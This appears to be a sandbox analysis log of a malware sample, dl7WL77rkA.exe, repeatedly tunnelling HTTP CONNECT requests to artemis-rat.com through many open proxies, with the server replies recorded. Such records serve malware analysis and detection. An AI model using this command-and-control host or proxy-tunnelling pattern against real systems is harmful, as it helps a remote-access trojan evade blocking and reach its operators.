                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.139219999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.779866934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.092811108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.405335903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.701973915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.405328989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            56192.168.2.549892103.76.172.23041533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.706267118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            57192.168.2.549905203.19.38.11410803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.715009928 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.044532061 CET | 309 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            58192.168.2.54988841.223.232.11731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.729206085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.698551893 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:48.515249014 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            59192.168.2.549997172.67.182.118803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.736386061 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.890456915 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            60192.168.2.54993243.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.747605085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            61192.168.2.550026104.19.247.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.751657963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.905920982 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            62192.168.2.549936106.14.255.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.751719952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            63192.168.2.550044104.21.194.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.757271051 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.911505938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            64192.168.2.550051104.17.37.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.759217024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.913362980 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            65192.168.2.550009172.67.35.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.763709068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.918279886 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            66192.168.2.5499555.58.239.21080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.770673990 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.482949018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.514276981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.593010902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.702481031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            67192.168.2.549980128.199.202.12231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.782944918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.891786098 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            68192.168.2.55002091.134.140.160515133876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.783261061 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 49974 | 42.49.148.167 | 9001 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.789592028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.132852077 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            70192.168.2.54994738.156.75.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.791918039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            71192.168.2.54994365.1.244.23210803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.807327986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.452877998 CET | 65 | IN | HTTP/1.1 200 Connection Established
Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            72192.168.2.55004938.162.28.6131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.821671963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.259355068 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 49986 | 72.210.252.137 | 4145 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.826425076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            74192.168.2.550077107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.827290058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            75192.168.2.550106104.16.72.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.833049059 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.987808943 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 50037 | 159.203.61.169 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.843894958 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.363742113 CET | 28 | IN | HTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            77192.168.2.549984190.69.157.2139993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.849529028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.467431068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.295463085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.936095953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.311353922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.244685888 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            78192.168.2.55013445.12.31.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.868364096 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.022933006 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            79192.168.2.550067159.65.39.23477323876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.874836922 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.420456886 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.372627020 CET  39  IN  HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            80192.168.2.550150104.24.236.203803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.878066063 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.032493114 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            81192.168.2.550137199.102.106.9441453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.890568972 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            82192.168.2.55000534.140.254.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.892518044 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.197731972 CET  122  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            date: Mon, 11 Mar 2024 02:30:37 GMT
